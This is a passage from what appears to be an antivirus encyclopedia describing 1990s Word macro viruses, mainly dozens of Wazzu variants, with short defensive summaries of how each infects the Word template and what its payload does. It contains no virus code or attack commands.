Tool|Option menu. It adds the following comments:
" Name: Nasty "
" Initial: Ugly "
In order to detect UglyKid.A, we advise to use an anti-virus
program that does smart checksumming.
[Word.Wallpaper.A]
Virus name: Word.Wallpaper.A
Virus Type: Word macro virus
Number of macros: 2 (or 5)
Encrypted: No
Macro names: AutoOpen, FilePrint (ToolsMacro, FileTemplates
ToolsCustomize)
Size of macros: 7353 Bytes in documents
29088 Bytes in global template
Place of origin: Unknown
Date of origin: Spring 1997
Payload: Yes
Seen In-The-Wild: No
Description:
Wallpaper.A infects the global template (normal.dot) when an
infected document is opened. Further documents become
infected when they are also opened (AutoOpen) or one of the
following menu items is selected:
FilePrint
FileTemplates
ToolsMacro
ToolsCustomize
Wallpaper uses FileTemplate, ToolsCustomize and ToolsMacro
to make recognition of an infected document more difficult
(called macro stealth technique).
On the 31st of each month, Wallpaper drops an image of a dead
head (SK2.BMP). It then modifies AUTOEXEC.BAT and
WIN.INI in order to change the background image of Windows.
The following file is also created in the C:\WINDOWS directory:
" REGSK2.REG "
Wallpaper also shows the following message on the 31st of each
month:
" [!!!PIRATE VIRUS!!!]--Active! The [PIRATE VIRUS] has pillaged "
" your computer! GO BACK TO MS-WORD?? "
[Word.Weather.A:Tw (aka Fish)]
Virus name: Word.Weather.A:Tw (aka Fish)
Virus Type: Word macro virus
Number of macros: 4
Encrypted: Yes
Macro names: AutoOpen, AutoNew, AutoExec,ToolsMacro
Size of macros: 4849 Bytes
Place of origin: Taiwan
Date of origin: 1996
Payload: Yes
Seen In-The-Wild: Yes
Description:
Weather.A activates when an infected document is opened.
It then displays a message and asks for user input. To continue
working, the user has to input the right answer.
It uses "ToolsMacro" to make recognition of an infected
document more difficult (called macro stealth technique).
Weather uses language specific commands, therefore it
only works with the Chinese/Taiwanese version of Microsoft Word.
[Word.Wazzu.A]
Virus name: Word.Wazzu.A
Virus Type: Word macro virus
Number of macros: 1
Encrypted: No
Macro names: AutoOpen
Size of macros: 632 Bytes
Place of origin: Washington, USA
Date of origin: Posted to Usenet in April 1996
Destructive: Yes
Common In-The-Wild: Yes
Description:
When an infected document is opened, Wazzu.A checks the
name of the active document. If it is "normal.dot", then the
virus macro is copied from the global template to the open
document. Otherwise normal.dot becomes infected.
Wazzu does not check if a document is already infected. It
simply overwrites the "autoopen" macro.
Wazzu has a destructive payload. It picks a random number
between 0 and 1 and if the number is smaller than 0.2
(probability of 20 percent), the virus will move a word from
one place in the document to another. This is repeated three
times. So the probability for a Word to be moved is 48.8
percent. After the third time, Wazzu picks a final random
number (between 0 and 1) and if the value is larger than 0.25
(probability of 25 percent), the word "Wazzu" will be inserted
into the document.
After an infected documents is cleaned, it has to be checked
carefully because chances of having a modified document
(words swapped or added) are over 61 percent. This can be a
very time consuming job with large documents.
Wazzu is a nickname for the Washington State University.
Wazzu.A has also been convert to the Word97 Word format (Word8).
[Word.Wazzu.AA]
Virus name: Word.Wazzu.AA
Virus Type: Word macro virus
Number of macros: 1
Encrypted: No
Macro names: AutoOpen
Size of macros: 1624 Bytes
Place of origin: Unknown
Date of origin: 1997
Destructive: No
Common In-The-Wild: No
Description:
The difference between this new variant and the original
Wazzu.A virus is that Wazzu.AA does not add the word
"wazzu" to newly opened documents.
Wazzu.AA infects the global template (normal.dot) when an
infected document is opened. Further documents become
infected when they are also opened (AutoOpen).
[Word.Wazzu.AB]
Virus name: Word.Wazzu.AB
Virus Type: Word macro virus
Number of macros: 1
Encrypted: No
Macro names: AutoOpen
Size of macros: 323 Bytes
Place of origin: Australia
Date of origin: February 1997
Destructive: No
Common In-The-Wild: No
Description:
The main difference between this new variant and previous
Wazzu viruses is that Wazzu.AB is another "do-nothing" macro
virus with no payload and some modified codes.
It infects the global template when an infected document is
opened. Further documents become infected when they are also
opened (AutoOpen).
[Word.Wazzu.AC]
Virus name: Word.Wazzu.AC
Virus Type: Word macro virus
Number of macros: 1
Encrypted: No
Macro names: AutoOpen
Size of macros: 433 Bytes
Place of origin: Unknown
Date of origin: 1997
Destructive: No
Common In-The-Wild: No
Description:
The main difference between this new variant and previous
Wazzu viruses is that Wazzu.AC is another "do-nothing" macro
virus with some code modifications and no payload.
It infects the global template when an infected document is
opened. Further documents become infected when they are also
opened (AutoOpen).
[Word.Wazzu.AD]
Virus name: Word.Wazzu.AD
Virus Type: Word macro virus
Number of macros: 1
Encrypted: No
Macro names: AutoOpen
Size of macros: 332 Bytes
Place of origin: Unknown
Date of origin: 1997
Destructive: No
Common In-The-Wild: No
Description:
The main difference between this new variant and previous
Wazzu viruses is that Wazzu.AD is another "do-nothing" macro
virus with some code modifications and no payload.
It infects the global template when an infected document is
opened. Further documents become infected when they are also
opened (AutoOpen).
[Word.Wazzu.AE]
Virus name: Word.Wazzu.AE
Virus Type: Word macro virus
Number of macros: 1
Encrypted: No
Macro names: AutoOpen
Size of macros: 618 Bytes
Place of origin: Unknown
Date of origin: 1997
Destructive: Yes
Common In-The-Wild: No
Description:
The main difference between this new variant and previous
Wazzu viruses is that Wazzu.AE has a slightly modified code.
It infects the global template when an infected document is
opened. Further documents become infected when they are also
opened (AutoOpen).
The payload is similar to the original Wazzu virus. There is a
3/5 chance that one word is moved to another position in the
active document.
[Word.Wazzu.AF]
Virus name: Word.Wazzu.AF
Virus Type: Word macro virus
Number of macros: 1
Encrypted: No
Macro names: AutoOpen
Size of macros: 1484 Bytes
Place of origin: USA
Date of origin: December 1996
Destructive: No
Common In-The-Wild: No
Description:
Wazzu.AF is a new variant based on the older Wazzu.D
virus. The only difference between the two viruses is that the
first blank line has been deleted.
For more information, please refer to the Wazzu.D virus
description.
[Word.Wazzu.AG]
Virus name: Word.Wazzu.AG
Virus Type: Word macro virus
Number of macros: 1
Encrypted: No
Macro names: AutoOpen
Size of macros: 332 Bytes
Place of origin: Unknown
Date of origin: 1997
Destructive: No
Common In-The-Wild: No
Description:
The main difference between this new variant and previous
Wazzu viruses is that Wazzu.AG is another "do-nothing" macro
virus with some code modifications and no payload.
It infects the global template when an infected document is
opened. Further documents become infected when they are also
opened (AutoOpen).
[Word.Wazzu.AH]
Virus name: Word.Wazzu.AH
Virus Type: Word macro virus
Number of macros: 1
Encrypted: No
Macro names: AutoOpen
Size of macros: 557 Bytes
Place of origin: USA
Date of origin: February 1997
Destructive: Yes
Common In-The-Wild: No
Description:
The main difference between this new variant and previous
Wazzu viruses is that Wazzu.AH has some code modifications.
Its payload inserts the word "YaHoo" instead of "wazzu".
The second payload, which moves words from one position to
another, is similar to Wazzu.A.
Wazzu.AH infects the global template when an infected
document is opened. Further documents become infected
when they are also opened (AutoOpen).
[Word.Wazzu.AI]
Virus name: Word.Wazzu.AI
Virus Type: Word macro virus
Number of macros: 1
Encrypted: No
Macro names: AutoOpen
Size of macros: 794 Bytes
Place of origin: Unknown
Date of origin: 1997
Destructive: No
Common In-The-Wild: No
Description:
The main difference between this new variant and previous
Wazzu viruses is that Wazzu.AI is another "do-nothing" macro
virus with some code modifications and no payload.
It infects the global template when an infected document is
opened. Further documents become infected when they are also
opened (AutoOpen).
[Word.Wazzu.AJ]
Virus name: Word.Wazzu.AJ
Virus Type: Word macro virus
Number of macros: 1
Encrypted: No
Macro names: AutoOpen
Size of macros: 430 Bytes
Place of origin: Unknown
Date of origin: 1997
Destructive: No
Common In-The-Wild: No
Description:
The main difference between this new variant and previous
Wazzu viruses is that Wazzu.AJ is another "do-nothing" macro
virus with some code modifications and no payload.
It infects the global template when an infected document is
opened. Further documents become infected when they are also
opened (AutoOpen).
[Word.Wazzu.AK]
Virus name: Word.Wazzu.AK
Virus Type: Word macro virus
Number of macros: 1
Encrypted: No
Macro names: autoOpen
Size of macros: 344 Bytes
Place of origin: Unknown
Date of origin: 1997
Destructive: No
Common In-The-Wild: No
Description:
The main difference between this new variant and previous
Wazzu viruses is that Wazzu.AK is another "do-nothing" macro
virus with code modifications and no payload.
It infects the global template when an infected document is
opened. Further documents become infected when they are also
opened (AutoOpen).
[Word.Wazzu.AL]
Virus name: Word.Wazzu.AL
Virus Type: Word macro virus
Number of macros: 1
Encrypted: No
Macro names: AutoOpen
Size of macros: 643 Bytes
Place of origin: Unknown
Date of origin: 1997
Destructive: Yes
Common In-The-Wild: No
Description:
The main difference between this new variant and previous
Wazzu viruses is that Wazzu.AL has a slightly modified code.
It infects the global template when an infected document is
opened. Further documents become infected when they are also
opened (AutoOpen).
The payload is similar to the original Wazzu virus. For
additional information, please refer to the Wazzu.A virus
description.
[Word.Wazzu.AM]
Virus name: Word.Wazzu.AM
Virus Type: Word macro virus
Number of macros: 1
Encrypted: No
Macro names: AutoOpen
Size of macros: 606 Bytes
Place of origin: Unknown
Date of origin: 1997
Destructive: Yes
Common In-The-Wild: No
Description:
The main difference between this new variant and previous
Wazzu viruses is that Wazzu.AM has a slightly modified code.
It infects the global template when an infected document is
opened. Further documents become infected when they are also
opened (AutoOpen).
The payload is similar to the original Wazzu virus. There is a
3/5 chance that one word is moved to another position in the
active document.
[Word.Wazzu.AN]
Virus name: Word.Wazzu.AN
Virus Type: Word macro virus
Number of macros: 1
Encrypted: No
Macro names: AutoOpen
Size of macros: 375 Bytes
Place of origin: Unknown
Date of origin: 1997
Destructive: No
Common In-The-Wild: No
Description:
The main difference between this new variant and previous
Wazzu viruses is that Wazzu.AN is another "do-nothing" macro
virus with some code modifications and no payload.
It infects the global template when an infected document is
opened. Further documents become infected when they are also
opened (AutoOpen).
It also contains the following comment in its code:
" REM This macro wipes out the Wazzu Virus! "
[Word.Wazzu.AO]
Virus name: Word.Wazzu.AO
Virus Type: Word macro virus
Number of macros: 1
Encrypted: No
Macro names: AutoOpen
Size of macros: 626 Bytes
Place of origin: Unknown
Date of origin: 1997
Destructive: Yes
Common In-The-Wild: No
Description:
The main difference between this new variant and previous
Wazzu viruses is that Wazzu.AO has a slightly modified code.
It infects the global template when an infected document is
opened. Further documents become infected when they are also
opened (AutoOpen).
The payload is similar to the original Wazzu virus. For
additional information, please refer to the Wazzu.A virus
description.
[Word.Wazzu.AP]
Virus name: Word.Wazzu.AP
Virus Type: Word macro virus
Number of macros: 1
Encrypted: No
Macro names: autoOpen
Size of macros: 432 Bytes
Place of origin: USA
Date of origin: February 1997
Destructive: No
Common In-The-Wild: No
Description:
The main difference between this new variant and previous
Wazzu viruses is that Wazzu.AP is another "do-nothing" macro
virus with some code modifications and no payload.
It infects the global template when an infected document is
opened. Further documents become infected when they are also
opened (AutoOpen).
[Word.Wazzu.AQ]
Virus name: Word.Wazzu.AQ
Virus Type: Word macro virus
Number of macros: 1
Encrypted: No
Macro names: autoOpen
Size of macros: 437 Bytes
Place of origin: USA
Date of origin: February 1997
Destructive: No
Common In-The-Wild: No
Description:
The main difference between this new variant and previous
Wazzu viruses is that Wazzu.AQ is another "do-nothing" macro
virus with a corrupted payload and some missing commands.
It infects the global template when an infected document is
opened. Further documents become infected when they are also
opened (AutoOpen).
[Word.Wazzu.AR]
Virus name: Word.Wazzu.AR
Virus Type: Word macro virus
Number of macros: 1
Encrypted: No
Macro names: autoOpen
Size of macros: 563 Bytes
Place of origin: Germany
Date of origin: February 1997
Destructive: Yes
Common In-The-Wild: No
Description:
The main difference between this new variant and previous
Wazzu viruses is that Wazzu.AR has a slightly modified
code.
It infects the global template when an infected document is
opened. Further documents become infected when they are also
opened (AutoOpen).
The payload is similar to the original Wazzu virus. For
more information, please refer to the Wazzu.A virus
description.
[Word.Wazzu.AS]
Virus name: Word.Wazzu.AS
Virus Type: Word macro virus
Number of macros: 1
Encrypted: No
Macro names: AutoOpen
Size of macros: 352 Bytes
Place of origin: Unknown
Date of origin: 1996
Destructive: Yes
Common In-The-Wild: No
Description:
The main difference between this new variant and Wazzu.L
is that Wazzu.AS has some modified codes.
It infects the global template when an infected document is
opened. Further documents become infected when they are also
opened (AutoOpen).
When a user opens a document, Wazzu.AS adds the following
text at the end of the document:
" ladderwork! "
[Word.Wazzu.AT]
Virus name: Word.Wazzu.AT
Virus Type: Word macro virus
Number of macros: 1
Encrypted: No
Macro names: AutoOpen
Size of macros: 576 Bytes
Place of origin: Unknown
Date of origin: 1997
Destructive: Yes
Common In-The-Wild: No
Description:
The main difference between this new variant and previous
Wazzu viruses is that Wazzu.AT has a slightly modified code.
It infects the global template when an infected document is
opened. Further documents become infected when they are also
opened (AutoOpen).
The payload is similar to the original Wazzu virus. There is a
3/5 chance that one word is moved to another position in the
active document.
[Word.Wazzu.AU]
Virus name: Word.Wazzu.AU
Virus Type: Word macro virus
Number of macros: 1
Encrypted: No
Macro names: AutoOpen
Size of macros: 630 Bytes
Place of origin: Unknown
Date of origin: 1997
Destructive: Yes
Common In-The-Wild: No
Description:
The main difference between this new variant and previous
Wazzu viruses is that Wazzu.AU has a slightly modified code.
It infects the global template when an infected document is
opened. Further documents become infected when they are also
opened (AutoOpen).
The payload is similar to the original Wazzu virus. For
additional information, please refer to the Wazzu.A virus
description.
[Word.Wazzu.AV]
Virus name: Word.Wazzu.AV
Virus Type: Word macro virus
Number of macros: 1
Encrypted: No
Macro names: AutoOpen
Size of macros: 321 Bytes
Place of origin: Unknown
Date of origin: Spring 1997
Destructive: No
Common In-The-Wild: No
Description:
The main difference between this new variant and previous
Wazzu viruses is that Wazzu.AV is another "do-nothing" macro
virus with small code modifications and no payload.
It infects the global template when an infected document is
opened. Further documents become infected when they are also
opened (AutoOpen).
[Word.Wazzu.AW]
Virus name: Word.Wazzu.AW
Virus Type: Word macro virus
Number of macros: 1
Encrypted: Yes
Macro names: AutoOpen
Size of macros: 1135 Bytes
Place of origin: USA
Date of origin: February 1997
Destructive: Yes
Common In-The-Wild: No
Description:
The main difference between this new variant and previous
Wazzu viruses is that Wazzu.AW is a combination of the
Wazzu virus and the ShareFun virus. It contains payloads from
both viruses.
Wazzu.AW moves words from one place to another, it enters
the word "wazzu" to the active document, and tries to mail
an infected document (C:\doc1.doc) to 3 randomly chosen
addresses from the MS Mail address book.
For further details, please refer to the Wazzu.A and
Sharefun.A virus description.
[Word.Wazzu.AX]
Virus name: Word.Wazzu.AX
Virus Type: Word macro virus
Number of macros: 1
Encrypted: No
Macro names: AutoOpen
Size of macros: 343 Bytes
Place of origin: USA
Date of origin: Spring 1997
Destructive: No
Common In-The-Wild: No
Description:
The main difference between this new variant and previous
Wazzu viruses is that Wazzu.AX is another "do-nothing" macro
virus with small code modifications and no payload.
It infects the global template when an infected document is
opened. Further documents become infected when they are also
opened (AutoOpen).
[Word.Wazzu.AY]
Virus name: Word.Wazzu.AY
Virus Type: Word macro virus
Number of macros: 1
Encrypted: No
Macro names: AutoOpen
Size of macros: 632 Bytes
Place of origin: Unknown
Date of origin: February 1997
Destructive: No
Common In-The-Wild: No
Description:
The main difference between this new variant and previous
Wazzu viruses is that Wazzu.AY is another "do-nothing" macro
virus with a corrupted payload and a 2-byte code modification.
It infects the global template when an infected document is
opened. Further documents become infected when they are also
opened (AutoOpen).
[Word.Wazzu.AZ]
Virus name: Word.Wazzu.AZ
Virus Type: Word macro virus
Number of macros: 1
Encrypted: No
Macro names: AutoClose
Size of macros: 659 Bytes
Place of origin: USA
Date of origin: February 1997
Destructive: Yes
Common In-The-Wild: No
Description:
The main difference between this new variant and previous
Wazzu viruses is that Wazzu.AZ has some code modifications.
Its payload inserts the word "uzzaw" (wazzu backwards).
Wazzu.AZ also uses the "AutoClose" macro instead of
"AutoOpen". It infects the global template when an infected
document is closed. Further documents become infected when
they are also closed (AutoClose).
[Word.Wazzu.B]
Virus name: Word.Wazzu.B
Virus Type: Word macro virus
Number of macros: 1
Encrypted: No
Macro names: AutoOpen
Size of macros: 697 Bytes
Place of origin: Unknown
Date of origin: 1996
Destructive: Yes
Common In-The-Wild: No
Description:
The difference between this new variant and the original
Wazzu.A virus is that Wazzu.B has an additional, unimportant,
virus comment.
For more information, please refer to the Wazzu.A virus
description.
[Word.Wazzu.BA]
Virus name: Word.Wazzu.BA
Virus Type: Word macro virus
Number of macros: 1
Encrypted: No
Macro names: AutoClose
Size of macros: 277 Bytes
Place of origin: USA
Date of origin: February 1997
Destructive: No
Common In-The-Wild: No
Description:
The main difference between this new variant and previous
Wazzu viruses is that Wazzu.BA has a slightly modified
code with no payload. It also uses the "AutoClose" macro
instead of "AutoOpen".
It infects the global template when an infected document is
closed. Further documents become infected when they are also
closed (AutoClose).
[Word.Wazzu.BB]
Virus name: Word.Wazzu.BB
Virus Type: Word macro virus
Number of macros: 1
Encrypted: No
Macro names: AutoOpen
Size of macros: 434 Bytes
Place of origin: Unknown
Date of origin: Spring 1997
Destructive: No
Common In-The-Wild: No
Description:
The main difference between this new variant and previous
Wazzu viruses is that Wazzu.BB is another "do-nothing" macro
virus with small code modifications and no payload.
It infects the global template when an infected document is
opened. Further documents become infected when they are also
opened (AutoOpen).
[Word.Wazzu.BC]
Virus name: Word.Wazzu.BC
Virus Type: Word macro virus
Number of macros: 1
Encrypted: No
Macro names: AutoOpen
Size of macros: 862 Bytes
Place of origin: Unknown
Date of origin: Spring 1997
Destructive: Yes
Common In-The-Wild: No
Description:
The main difference between this new variant and previous
Wazzu viruses is that Wazzu.BC targets an anti-virus
program in its payload.
It renames the default directory of VET (Australian product).
Wazzu.BC also contains other payloads where it moves words
and enters the following words to newly opened documents:
(probability differs in each case)
" waffle "
" zoom "
" kill "
" mum "
Wazzu.BC infects the global template when an infected
document is opened. Further documents become infected when
they are also opened (AutoOpen).
[Word.Wazzu.BD]
Virus name: Word.Wazzu.BD
Virus Type: Word macro virus
Number of macros: 1
Encrypted: Yes
Macro names: AutoOpen
Size of macros: 525 Bytes
Place of origin: Unknown
Date of origin: Spring 1997
Destructive: Yes
Common In-The-Wild: No
Description:
The main difference between this new variant and previous
Wazzu viruses is that Wazzu.BD selects all text of a newly
opened document and then deletes it.
Recovery is impossible since Wazzu.BD also removes the
EDIT|EDITUNDO menu item.
This payload triggers with a chance of 1/50.
Wazzu.BD also shows the following message:
" Where do you want to go today "
Wazzu.BD infects the global template when an infected
document is opened. Further documents become infected
when they are also opened (AutoOpen).
[Word.Wazzu.BE]
Virus name: Word.Wazzu.BE
Virus Type: Word macro virus
Number of macros: 1
Encrypted: No
Macro names: AutoOpen
Size of macros: 439 Bytes
Place of origin: Unknown
Date of origin: Spring 1997
Destructive: No
Common In-The-Wild: No
Description:
The main difference between this new variant and previous
Wazzu viruses is that Wazzu.BE shows the following
message during infection:
" Wazzu n'est pas mort "
Wazzu.BE infects the global template when an infected
document is opened. Further documents become infected
when they are also opened (AutoOpen).
[Word.Wazzu.BF]
Virus name: Word.Wazzu.BF
Virus Type: Word macro virus
Number of macros: 1
Encrypted: No
Macro names: AutoOpen
Size of macros: 334 Bytes
Place of origin: USA
Date of origin: Spring 1997
Destructive: No
Common In-The-Wild: No
Description:
The main difference between this new variant and previous
Wazzu viruses is that Wazzu.BF is another "do-nothing" macro
virus with small code modifications and no payload.
It infects the global template when an infected document is
opened. Further documents become infected when they are also
opened (AutoOpen).
[Word.Wazzu.BG]
Virus name: Word.Wazzu.BG
Virus Type: Word macro virus
Number of macros: 1
Encrypted: No
Macro names: AutoOpen
Size of macros: 432 Bytes
Place of origin: Unknown
Date of origin: Spring 1997
Destructive: No
Common In-The-Wild: No
Description:
The main difference between this new variant and previous
Wazzu viruses is that Wazzu.BG is another "do-nothing" macro
virus with no payload.
It infects the global template when an infected document is
opened. Further documents become infected when they are also
opened (AutoOpen).
[Word.Wazzu.BH]
Virus name: Word.Wazzu.BH
Virus Type: Word macro virus
Number of macros: 1
Encrypted: No
Macro names: AutoOpen
Size of macros: 472 Bytes
Place of origin: Unknown
Date of origin: Spring 1997
Payload: Yes
Common In-The-Wild: No
Description:
The main difference between this new variant and previous
Wazzu viruses is that Wazzu.BH tries to remove all text
from a newly opened document.
It does not remove the "Edit|Undo" option, thus users can
recover after the text disappears.
It infects the global template when an infected document is
opened. Further documents become infected when they are also
opened (AutoOpen).
[Word.Wazzu.BI]
Virus name: Word.Wazzu.BI
Virus Type: Word macro virus
Number of macros: 1
Encrypted: No
Macro names: AutoOpen
Size of macros: 361 Bytes
Place of origin: Unknown
Date of origin: Spring 1997
Destructive: No
Common In-The-Wild: No
Description:
The main difference between this new variant and previous
Wazzu viruses is that Wazzu.BI is another "do-nothing" macro
virus with some code modifications and no payload.
It infects the global template when an infected document is
opened. Further documents become infected when they are also
opened (AutoOpen).
[Word.Wazzu.BJ]
Virus name: Word.Wazzu.BJ
Virus Type: Word macro virus
Number of macros: 1
Encrypted: No
Macro names: AutoOpen
Size of macros: 299 Bytes
Place of origin: Unknown
Date of origin: Spring 1997
Destructive: No
Common In-The-Wild: No
Description:
The main difference between this new variant and previous
Wazzu viruses is that Wazzu.BJ is another "do-nothing" macro
virus with some code modifications and no payload.
It infects the global template when an infected document is
opened. Further documents become infected when they are also
opened (AutoOpen).
[Word.Wazzu.BK]
Virus name: Word.Wazzu.BK
Virus Type: Word macro virus
Number of macros: 1
Encrypted: No
Macro names: AutoOpen
Size of macros: 623 Bytes
Place of origin: Unknown
Date of origin: Spring 1997
Destructive: Yes
Common In-The-Wild: No
Description:
The main difference between this new variant and previous
Wazzu viruses is that Wazzu.BK has a slightly modified code.
It infects the global template when an infected document is
opened. Further documents become infected when they are also
opened (AutoOpen).
The payload is similar to the original Wazzu virus. For
additional information, please refer to the Wazzu.A virus
description.
[Word.Wazzu.BL]
Virus name: Word.Wazzu.BL
Virus Type: Word macro virus
Number of macros: 1
Encrypted: No
Macro names: AutoOpen
Size of macros: 678 Bytes
Place of origin: Unknown
Date of origin: Spring 1997
Destructive: Yes
Common In-The-Wild: No
Description:
The main difference between this new variant and previous
Wazzu viruses is that Wazzu.BL has a slightly modified code.
It infects the global template when an infected document is
opened. After infection of the global template, it fails to
infect other documents. Therefore, it is not likely to survive
in the wild.
[Word.Wazzu.BM]
Virus name: Word.Wazzu.BM
Virus Type: Word macro virus
Number of macros: 1
Encrypted: No
Macro names: AutoOpen
Size of macros: 296 Bytes
Place of origin: USA
Date of origin: Spring 1997
Destructive: No
Common In-The-Wild: No
Description:
The main difference between this new variant and previous
Wazzu viruses is that Wazzu.BM is another "do-nothing" macro
virus with modified codes and no payload.
It infects the global template when an infected document is
opened. Further documents become infected when they are also
opened (AutoOpen).
[Word.Wazzu.BN]
Virus name: Word.Wazzu.BN
Virus Type: Word macro virus
Number of macros: 1
Encrypted: No
Macro names: AutoOpen
Size of macros: 433 Bytes
Place of origin: Germany
Date of origin: Spring 1997
Destructive: No
Common In-The-Wild: No
Description:
The main difference between this new variant and previous
Wazzu viruses is that Wazzu.BN is another "do-nothing" macro
virus with modified codes and no payload.
It infects the global template when an infected document is
opened. Further documents become infected when they are also
opened (AutoOpen).
[Word.Wazzu.BO]
Virus name: Word.Wazzu.BO
Virus Type: Word macro virus
Number of macros: 1
Encrypted: Yes
Macro names: AutoOpen
Size of macros: 632 Bytes
Place of origin: Unknown
Date of origin: 1997
Destructive: Yes
Common In-The-Wild: No
Description:
The main difference between this new variant and previous
Wazzu viruses is that Wazzu.BO has a slightly corrupted code.
It infects the global template when an infected document is
opened. Further documents become infected when they are also
opened (AutoOpen).
The payload is similar to the original Wazzu virus. There is a
3/5 chance that one word is moved to another position in the
active document.
[Word.Wazzu.BP]
Virus name: Word.Wazzu.BP
Virus Type: Word macro virus
Number of macros: 1
Encrypted: Yes
Macro names: AutoOpen
Size of macros: 289 Bytes
Place of origin: Unknown
Date of origin: Spring 1997
Destructive: No
Common In-The-Wild: No
Description:
The main difference between this new variant and previous
Wazzu viruses is that Wazzu.BP displays the following
message:
" Leaving Traces of Wazzu Around the World... "
Wazzu.BP infects the global template when an infected
document is opened. Further documents become infected
when they are also opened (AutoOpen).
[Word.Wazzu.BQ]
Virus name: Word.Wazzu.BQ
Virus Type: Word macro virus
Number of macros: 1
Encrypted: No
Macro names: AutoOpen
Size of macros: 670 Bytes
Place of origin: Unknown
Date of origin: Spring 1997
Destructive: Yes
Common In-The-Wild: No
Description:
The main difference between this new variant and previous
Wazzu viruses is that Wazzu.BQ has a slightly modified code.
It contains one additional virus author comment.
Wazzu.BQ infects the global template when an infected
document is opened. Further documents become infected
when they are also opened (AutoOpen).
The payload is similar to the original Wazzu virus. For
additional information, please refer to the Wazzu.A virus
description.
[Word.Wazzu.BR]
Virus name: Word.Wazzu.BR
Virus Type: Word macro virus
Number of macros: 1
Encrypted: No
Macro names: AutoOpen
Size of macros: 332 Bytes
Place of origin: Unknown
Date of origin: Spring 1997
Destructive: No
Common In-The-Wild: No
Description:
The main difference between this new variant and previous
Wazzu viruses is that Wazzu.BR is another "do-nothing" macro
virus with some code modifications and no payload.
It infects the global template when an infected document is
opened. Further documents become infected when they are also
opened (AutoOpen).
[Word.Wazzu.BS]
Virus name: Word.Wazzu.BS
Virus Type: Word macro virus
Number of macros: 1
Encrypted: No
Macro names: AutoOpen
Size of macros: 605 Bytes
Place of origin: France
Date of origin: Spring 1997
Destructive: Yes
Common In-The-Wild: No
Description:
The main difference between this new variant and previous
Wazzu viruses is that Wazzu.BS replaces the word "donc" with
the following:
" Mon prof est con, "
This occurs when a document is opened (probability: 3/4).
The second payload is similar to Wazzu.A, where one word
is moved from one position to another. For further details,
please refer to the Wazzu.A virus description.
Wazzu.BS infects the global template when an infected
document is opened. Further documents become infected
when they are also opened (AutoOpen).
[Word.Wazzu.BU]
Virus name: Word.Wazzu.BU
Virus Type: Word macro virus
Number of macros: 1
Encrypted: No
Macro names: AutoOpen
Size of macros: 148 Bytes
Place of origin: Unknown
Date of origin: Spring 1997
Destructive: No
Common In-The-Wild: No
Description:
The main difference between this new variant and previous
Wazzu viruses is that Wazzu.BU is another "do-nothing" macro
virus with some code modifications and no payload.
It infects the global template when an infected document is
opened. Further documents become infected when they are also
opened (AutoOpen).
[Word.Wazzu.BV]
Virus name: Word.Wazzu.BV
Virus Type: Word macro virus
Number of macros: 1
Encrypted: No
Macro names: AutoOpen
Size of macros: 152 Bytes
Place of origin: Unknown
Date of origin: Spring 1997
Destructive: No
Common In-The-Wild: No
Description:
The main difference between this new variant and previous
Wazzu viruses is that Wazzu.BV is another "do-nothing" macro
virus with some code modifications and no payload.
It infects the global template when an infected document is
opened. Further documents become infected when they are also
opened (AutoOpen).
[Word.Wazzu.BW]
Virus name: Word.Wazzu.BW
Virus Type: Word macro virus
Number of macros: 1
Encrypted: No
Macro names: AutoOpen
Size of macros: 158 Bytes
Place of origin: Unknown
Date of origin: Spring 1997
Destructive: No
Common In-The-Wild: No
Description:
The main difference between this new variant and previous
Wazzu viruses is that Wazzu.BW is another "do-nothing" macro
virus with some code modifications and no payload.
It infects the global template when an infected document is
opened. Further documents become infected when they are also
opened (AutoOpen).
[Word.Wazzu.BX]
Virus name: Word.Wazzu.BX
Virus Type: Word macro virus
Number of macros: 1
Encrypted: No
Macro names: AutoOpen
Size of macros: 345 Bytes
Place of origin: Unknown
Date of origin: Spring 1997
Destructive: No
Common In-The-Wild: No
Description:
The main difference between this new variant and previous
Wazzu viruses is that Wazzu.BX is another "do-nothing" macro
virus with some code modifications and no payload.
It infects the global template when an infected document is
opened. Further documents become infected when they are also
opened (AutoOpen).
[Word.Wazzu.BY]
Virus name: Word.Wazzu.BY
Virus Type: Word macro virus
Number of macros: 1
Encrypted: No
Macro names: AutoOpen
Size of macros: 277 Bytes
Place of origin: Unknown
Date of origin: Spring 1997
Destructive: No
Common In-The-Wild: No
Description:
The main difference between this new variant and previous
Wazzu viruses is that Wazzu.BY is another "do-nothing" macro
virus with some code modifications and no payload.
It infects the global template when an infected document is
opened. Further documents become infected when they are also
opened (AutoOpen).
[Word.Wazzu.C]
Virus name: Word.Wazzu.C
Virus Type: Word macro virus
Number of macros: 1
Encrypted: No
Macro names: autoOpen
Size of macros: 433 Bytes
Place of origin: Unknown
Date of origin: Summer 1996
Destructive: No
Common In-The-Wild: Yes
Description:
The difference between this new variant and the original
Wazzu.A virus is that Wazzu.C does not have any
destructive payload. It is only infectious.
During the Spring of 1997, Wazzu.C was discovered in a Word97
document (Word8).
[Word.Wazzu.CB]
Virus name: Word.Wazzu.CB
Virus Type: Word macro virus
Number of macros: 1
Encrypted: No
Macro names: AutoOpen
Size of macros: 343 Bytes
Place of origin: Unknown
Date of origin: Spring 1997
Destructive: No
Common In-The-Wild: No
Description:
The main difference between this new variant and previous
Wazzu viruses is that Wazzu.CB is another "do-nothing" macro
virus with some corrupted codes and no payload.
It infects the global template when an infected document is
opened. Further documents become infected when they are also
opened (AutoOpen).
[Word.Wazzu.D]
Virus name: Word.Wazzu.D
Virus Type: Word macro virus
Number of macros: 1
Encrypted: No
Macro names: autoOpen
Size of macros: 331 Bytes
Place of origin: Unknown
Date of origin: Summer 1996
Destructive: No
Common In-The-Wild: No
Description:
The difference between this new variant and Wazzu.C is that
some unused codes are missing in Wazzu.D. The difference to
the original Wazzu is that it does not contain any destructive
payload, such as changing documents. Wazzu.D is only infectious.
[Word.Wazzu.E]
Virus name: Word.Wazzu.E
Virus Type: Word macro virus
Number of macros: 1
Encrypted: No
Macro names: autoOpen
Size of macros: 318 Bytes
Place of origin: Unknown
Date of origin: September 1996
Destructive: No
Common In-The-Wild: Yes
Description:
The difference between this new variant and Wazzu.D is that
some unused codes are missing in Wazzu.E. The difference to
the original Wazzu is that it does not contain any destructive
payload, such as changing documents. Wazzu.E is only infectious.
[Word.Wazzu.F]
Virus name: Word.Wazzu.F
Virus Type: Word macro virus
Number of macros: 1
Encrypted: Yes
Macro names: autoOpen
Size of macros: 450 Bytes
Place of origin: Unknown
Date of origin: September 1996
Destructive: No
Common In-The-Wild: Yes
Description:
Wazzu.F is a minor variant of Wazzu.C with two changes.
Wazzu.F displays a message with a 1/10 chance and its code
is encrypted. The difference to the original Wazzu is that
